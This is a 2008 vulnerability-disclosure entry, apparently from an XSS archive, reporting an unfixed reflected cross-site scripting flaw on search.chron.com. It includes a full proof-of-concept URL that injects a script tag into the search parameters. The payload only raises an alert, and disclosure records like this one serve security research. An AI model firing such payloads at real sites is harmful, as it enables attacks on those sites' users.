Security researcher tenest submitted, on 03/01/2008, a cross-site scripting (XSS) vulnerability affecting search.chron.com, which at the time of submission ranked 4107 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 04/01/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
| Date submitted | Date published | Status | Author | Domain | Category | Pagerank |
|---|---|---|---|---|---|---|
| 03/01/2008 | 04/01/2008 | UNFIXED | tenest | search.chron.com | XSS | 4107 |
 
 
URL: http://search.chron.com/chronicle/search.do?basicSearchFormComponent.resultsPerPage=10&basicSearchFormComponent.pageNum=1&basicSearchFormComponent.maxResults=1000&basicSearchFormComponent.mode=search&basicSearchFormComponent.booleanMode=false&basicSearchFormComponent.propertyGroup=CHRONICLE&basicSearchFormComponent.configName=basic&basicSearchFormComponent.siteName=Chronicle&basicSearchFormComponent.suggestedFromDoc=&basicSearchFormComponent.suggestedTitle=&basicSearchFormComponent.contextMode=false&basicSearchFormComponent.shadowSearchText=%22%3EHELLO%3Cscript%3Ealert%28%27xssed%27%29%3B%3C%2Fscript%3E&basicSearchFormComponent.shadowDatabaseList=&basicSearchFormComponent.fieldText=&resultNavigationFormComponent.propertyGroup=CHRONICLE&resultNavigationFormComponent.configName=taxonomy&resultNavigationFormComponent.selectedPath=&resultNavigationFormComponent.currentNavigationTree=&resultNavigationFormComponent.limitResults=0&iqlRulesFormComponent.configName=iql&iqlRulesFormComponent.processManualRules=true&iqlRulesFormComponent.processSponsoredRules=true&iqlRulesFormComponent.processConcepts=true&advancedSearchFormComponent.searchAllWordsText=&advancedSearchFormComponent.searchExactPhraseText=&advancedSearchFormComponent.searchAtleastOneText=&advancedSearchFormComponent.searchWithoutText=&advancedSearchFormComponent.selectedTermLocation=&advancedSearchFormComponent.selectedLanguage=&advancedSearchFormComponent.selectedInterval=&archiveSearchFormComponent.searchAnywhere=&archiveSearchFormComponent.searchHeadline=&archiveSearchFormComponent.searchAuthor=&archiveSearchFormComponent.selectedSection=&archiveSearchFormComponent.selectedInterval=7&archiveSearchFormComponent.selectedFromMonth=&archiveSearchFormComponent.selectedFromDay=&archiveSearchFormComponent.selectedFromYear=2007&archiveSearchFormComponent.selectedToMonth=&archiveSearchFormComponent.selectedToDay=&archiveSearchFormComponent.selectedToYear=2007&selectedSort=Date&basicSearchFormComponent.searchText=%22%3EHELLO%3Cscript%3Ealert%28%27xssed%27%29%3B%3C%2Fscript%3E&basicSearchFormComponent.selectedDatabaseNames=Everything&search=Go